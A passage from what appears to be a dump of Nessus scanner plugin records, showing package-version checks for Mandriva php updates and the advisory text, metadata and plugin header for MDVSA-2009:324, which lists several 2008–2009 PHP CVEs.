(rpm_check(release:\"MDK2009.1\", reference:\"php-fam-5.0.1-7.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-fcgi-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-fileinfo-1.0.4-15.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-filepro-5.1.6-17.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-filter-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-ftp-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-gd-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-gettext-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-gmp-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-hash-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-iconv-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-idn-1.2b-15.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-imap-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-ini-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-json-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-ldap-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mbstring-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mcal-0.6-27.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mcrypt-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mhash-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mime_magic-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-ming-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mssql-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mysql-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-mysqli-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-ncurses-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-odbc-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-openssl-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-optimizer-0.1-0.alpha1.5.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pcntl-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pdo-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pdo_dblib-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pdo_mysql-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pdo_odbc-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pdo_pgsql-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pdo_sqlite-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pgsql-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-posix-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-pspell-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-readline-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-recode-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sasl-0.1.0-25.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-session-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-shmop-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-snmp-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-soap-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sockets-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sqlite-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-ssh2-0.11.0-2.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-suhosin-0.9.29-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sybase-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sysvmsg-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sysvsem-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-sysvshm-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-tclink-3.4.4-10.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-tidy-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-tokenizer-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-translit-0.6.0-7.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-vld-0.9.1-8.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-wddx-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-xattr-1.1.0-6.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-xdebug-2.0.5-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-xml-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-xmlreader-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-xmlrpc-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-xmlwriter-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-xsl-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-zip-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"php-zlib-5.2.11-0.2mdv2009.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:52:27", "description": "Multiple vulnerabilities was discovered and corrected in php :\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key\nwith the NULL byte. NOTE: this might only be a vulnerability in\nlimited circumstances in which the attacker can modify or add database\nentries but does not have permissions to truncate the file\n(CVE-2008-7068).\n\nThe JSON_parser function (ext/json/JSON_parser.c) in PHP 5.2.x before\n5.2.9 allows remote attackers to cause a denial of service\n(segmentation fault) via a malformed string to the json_decode API\nfunction (CVE-2009-1271).\n\n - Fixed upstream bug #48378 (exif_read_data() segfaults on\n certain corrupted .jpeg files) (CVE-2009-2687).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact and\nattack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in PHP\nbefore 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293)\n\nThe _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.0, and the\nGD Graphics Library 2.x, does not properly verify a certain\ncolorsTotal structure member, which might allow remote attackers to\nconduct buffer overflow or buffer over-read attacks via a crafted GD\nfile, a different vulnerability than CVE-2009-3293. NOTE: some of\nthese details are obtained from third-party information\n(CVE-2009-3546).\n\nThe tempnam function in ext/standard/file.c in PHP 5.2.11 and earlier,\nand 5.3.x before 5.3.1, allows context-dependent attackers to bypass\nsafe_mode restrictions, and create files in group-writable or\nworld-writable directories, via the dir and prefix arguments\n(CVE-2009-3557).\n\nThe posix_mkfifo function in ext/posix/posix.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers to\nbypass open_basedir restrictions, and create FIFO files, via the\npathname and mode arguments, as demonstrated by creating a .htaccess\nfile (CVE-2009-3558).\n\nPHP 5.2.11, and 5.3.x before 5.3.1, does not restrict the number of\ntemporary files created when handling a multipart/form-data POST\nrequest, which allows remote attackers to cause a denial of service\n(resource exhaustion), and makes it easier for remote attackers to\nexploit local file inclusion vulnerabilities, via multiple requests,\nrelated to lack of support for the max_file_uploads directive\n(CVE-2009-4017).\n\nThe proc_open function in ext/standard/proc_open.c in PHP before\n5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)\nsafe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars\ndirectives, which allows context-dependent attackers to execute\nprograms with an arbitrary environment via the env parameter, as\ndemonstrated by a crafted value of the LD_LIBRARY_PATH environment\nvariable (CVE-2009-4018).\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key\nwith the NULL byte. NOTE: this might only be a vulnerability in\nlimited circumstances in which the attacker can modify or add database\nentries but does not have permissions to truncate the file\n(CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact and\nattack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in PHP\nbefore 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293). However\nin Mandriva we don't use the bundled libgd source in php per default,\nthere is a unsupported package in contrib named php-gd-bundled that\neventually will get updated to pickup these fixes.\n\nThe php-suhosin package has been upgraded to 0.9.22 which has better\nsupport for apache vhosts.\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers\n\nThis update provides a solution to these vulnerabilities.", "edition": 27, "published": "2009-12-08T00:00:00", "title": "Mandriva Linux Security Advisory : php (MDVSA-2009:324)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3546", "CVE-2009-3558", "CVE-2009-1271", "CVE-2009-4018", "CVE-2009-2687", "CVE-2009-3292", "CVE-2008-7068", "CVE-2009-4017", "CVE-2009-3291", "CVE-2009-3293", "CVE-2009-3557"], "modified": "2009-12-08T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:php-xmlwriter", "p-cpe:/a:mandriva:linux:php-fcgi", "p-cpe:/a:mandriva:linux:php-json", "p-cpe:/a:mandriva:linux:php-bcmath", "p-cpe:/a:mandriva:linux:php-gd", "p-cpe:/a:mandriva:linux:php-pdo", "p-cpe:/a:mandriva:linux:php-calendar", "p-cpe:/a:mandriva:linux:php-mbstring", "p-cpe:/a:mandriva:linux:php-mhash", "p-cpe:/a:mandriva:linux:php-sysvmsg", "p-cpe:/a:mandriva:linux:php-ming", "p-cpe:/a:mandriva:linux:php-ini", "p-cpe:/a:mandriva:linux:php-posix", "p-cpe:/a:mandriva:linux:php-cgi", "p-cpe:/a:mandriva:linux:php-pcntl", "p-cpe:/a:mandriva:linux:php-hash", "p-cpe:/a:mandriva:linux:php-zlib", "p-cpe:/a:mandriva:linux:php-openssl", "p-cpe:/a:mandriva:linux:php-soap", "p-cpe:/a:mandriva:linux:php-xml", "p-cpe:/a:mandriva:linux:php-ftp", "p-cpe:/a:mandriva:linux:php-dom", "p-cpe:/a:mandriva:linux:php-curl", "p-cpe:/a:mandriva:linux:php-sysvsem", "p-cpe:/a:mandriva:linux:php-ctype", "p-cpe:/a:mandriva:linux:php-sockets", "p-cpe:/a:mandriva:linux:php-gmp", "p-cpe:/a:mandriva:linux:php-sysvshm", "p-cpe:/a:mandriva:linux:php-dbase", "p-cpe:/a:mandriva:linux:php-pdo_pgsql", "p-cpe:/a:mandriva:linux:php-pdo_mysql", "p-cpe:/a:mandriva:linux:php-xmlrpc", "p-cpe:/a:mandriva:linux:php-bz2", "p-cpe:/a:mandriva:linux:php-ldap", "p-cpe:/a:mandriva:linux:php-xsl", "p-cpe:/a:mandriva:linux:php-tidy", "p-cpe:/a:mandriva:linux:lib64php5_common5", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:php-ncurses", "p-cpe:/a:mandriva:linux:php-xmlreader", "p-cpe:/a:mandriva:linux:php-cli", "p-cpe:/a:mandriva:linux:php-mssql", "p-cpe:/a:mandriva:linux:php-sqlite", "p-cpe:/a:mandriva:linux:php-session", "p-cpe:/a:mandriva:linux:php-readline", "p-cpe:/a:mandriva:linux:php-pdo_sqlite", "p-cpe:/a:mandriva:linux:libphp5_common5", "p-cpe:/a:mandriva:linux:php-tokenizer", "p-cpe:/a:mandriva:linux:php-pgsql", "p-cpe:/a:mandriva:linux:php-simplexml", "p-cpe:/a:mandriva:linux:php-recode", "p-cpe:/a:mandriva:linux:php-gettext", "p-cpe:/a:mandriva:linux:php-imap", "p-cpe:/a:mandriva:linux:php-iconv", "p-cpe:/a:mandriva:linux:php-devel", "p-cpe:/a:mandriva:linux:php-pdo_dblib", "p-cpe:/a:mandriva:linux:php-exif", "p-cpe:/a:mandriva:linux:php-odbc", "p-cpe:/a:mandriva:linux:php-pdo_odbc", "p-cpe:/a:mandriva:linux:php-snmp", "p-cpe:/a:mandriva:linux:php-mysql", "p-cpe:/a:mandriva:linux:php-pspell", "p-cpe:/a:mandriva:linux:php-mime_magic", "p-cpe:/a:mandriva:linux:php-filter", "p-cpe:/a:mandriva:linux:php-wddx", "p-cpe:/a:mandriva:linux:php-dba", "p-cpe:/a:mandriva:linux:php-mcrypt", "p-cpe:/a:mandriva:linux:php-shmop", "p-cpe:/a:mandriva:linux:php-suhosin", "p-cpe:/a:mandriva:linux:php-mysqli"], "id": "MANDRIVA_MDVSA-2009-324.NASL", "href": "https://www.tenable.com/plugins/nessus/43043", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:324. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43043);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-1271\", \"CVE-2009-2687\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\", \"CVE-2009-3546\", \"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_bugtraq_id(35440, 36449, 36712, 37079, 37138);\n script_xref(name:\"MDVSA\", value:\"2009:324\");\n\n script_name(english:\"Mandriva Linux Security Advisory : php (MDVSA-2009:324)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities was discovered and corrected in php :\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key\nwith the NULL byte. NOTE: this might only be a vulnerability in\nlimited circumstances in which the attacker can modify or add database\nentries but does not have permissions to truncate the file\n(CVE-2008-7068).\n\nThe JSON_parser function (ext/json/JSON_parser.c) in PHP 5.2.x before\n5.2.9 allows remote attackers to cause a denial of service\n(segmentation fault) via a malformed string to the json_decode API\nfunction (CVE-2009-1271).\n\n - Fixed upstream bug #48378 (exif_read_data() segfaults on\n certain corrupted .jpeg files) (CVE-2009-2687).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact and\nattack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in PHP\nbefore 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293)\n\nThe _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.0, and the\nGD Graphics Library 2.x, does not properly verify a certain\ncolorsTotal structure member, which might allow remote attackers to\nconduct buffer overflow or buffer over-read attacks via a crafted GD\nfile, a different vulnerability than CVE-2009-3293. NOTE: some of\nthese details are obtained from third-party information\n(CVE-2009-3546).\n\nThe tempnam function in ext/standard/file.c in PHP 5.2.11 and earlier,\nand 5.3.x before 5.3.1, allows context-dependent attackers to bypass\nsafe_mode restrictions, and create files in group-writable or\nworld-writable directories, via the dir and prefix arguments\n(CVE-2009-3557).\n\nThe posix_mkfifo function in ext/posix/posix.c in PHP 5.2.11 and\nearlier, and 5.3.x before 5.3.1, allows context-dependent attackers to\nbypass open_basedir restrictions, and create FIFO files, via the\npathname and mode arguments, as demonstrated by creating a .htaccess\nfile (CVE-2009-3558).\n\nPHP 5.2.11, and 5.3.x before 5.3.1, does not restrict the number of\ntemporary files created when handling a multipart/form-data POST\nrequest, which allows remote attackers to cause a denial of service\n(resource exhaustion), and makes it easier for remote attackers to\nexploit local file inclusion vulnerabilities, via multiple requests,\nrelated to lack of support for the max_file_uploads directive\n(CVE-2009-4017).\n\nThe proc_open function in ext/standard/proc_open.c in PHP before\n5.2.11 and 5.3.x before 5.3.1 does not enforce the (1)\nsafe_mode_allowed_env_vars and (2) safe_mode_protected_env_vars\ndirectives, which allows context-dependent attackers to execute\nprograms with an arbitrary environment via the env parameter, as\ndemonstrated by a crafted value of the LD_LIBRARY_PATH environment\nvariable (CVE-2009-4018).\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key\nwith the NULL byte. NOTE: this might only be a vulnerability in\nlimited circumstances in which the attacker can modify or add database\nentries but does not have permissions to truncate the file\n(CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact and\nattack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in PHP\nbefore 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293). However\nin Mandriva we don't use the bundled libgd source in php per default,\nthere is a unsupported package in contrib named php-gd-bundled that\neventually will get updated to pickup these fixes.\n\nThe php-suhosin package has been upgraded to 0.9.22 which has better\nsupport for apache vhosts.\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers\n\nThis update provides a solution to these vulnerabilities.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ini\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mime_magic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_dblib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-simplexml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/07\");\n 